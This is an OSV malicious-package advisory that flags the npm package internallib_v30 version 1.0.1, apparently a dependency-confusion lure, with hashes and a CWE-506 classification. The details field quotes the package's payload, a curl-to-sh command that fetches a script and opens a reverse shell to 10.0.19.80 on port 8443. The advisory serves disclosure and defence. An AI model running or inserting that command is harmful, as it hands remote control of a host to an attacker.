{"id":"MAL-2026-17633","summary":"Malicious code in internallib_v30 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (52b503d4f5d82ea2a67ac1cb9e3bbb82d009d375495f72cf13623f998a239cfe)\ninternallib_v30@1.0.1 ships a single index.js whose exported command() function invokes /bin/bash -c with 'curl https://reverse-shell.sh/10.0.19.80:8443 | sh', fetching a remote shell script over HTTPS and piping it directly into sh. Invoking the exported function from any consumer causes the installer host to download and execute attacker-staged code that opens a reverse shell to 10.0.19.80 on port 8443. The package has no documented legitimate purpose, empty author/description metadata, and a name consistent with an internal/dependency-confusion target.\n","modified":"2026-10-06T04:30:50.497661670Z","published":"2026-10-06T03:56:55Z","database_specific":{"malicious-packages-origins":[{"versions":["1.0.1"],"id":"IN-MAL-2026-021087","import_time":"2026-10-06T04:22:56.146596223Z","modified_time":"2026-10-06T03:56:55Z","sha256":"52b503d4f5d82ea2a67ac1cb9e3bbb82d009d375495f72cf13623f998a239cfe","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v30/v/1.0.1"}],"affected":[{"package":{"name":"internallib_v30","ecosystem":"npm","purl":"pkg:npm/internallib_v30"},"versions":["1.0.1"],"database_specific":{"indicators":{"evidence_files":[{"path":"index.js","sha256":"a08e3608d9cb7ab102dfda5140ebe691d5a115e6af5f0fc2518a66f232217ab4","tlsh":"c7c0c0b786d7023af74961e0de15f861b8478c703a3800b0b004405210c3c4e32070ff"}],"package_integrity":[{"hashes":{"sha1":"2ae3cd34fe389b5edf1388c8bd97a7236745f279","sha512_sri":"sha512-AQaz8avUkGVKvqz/t/aAi/Z3xJ1nL3Ki6kZYACNo/hkHIgcTfOTJTz06vWuv/VkgFp3JjtfiggS+HLMd3+X+EA=="},"filename":"internallib_v30-1.0.1.tgz"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v30/MAL-2026-17633.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}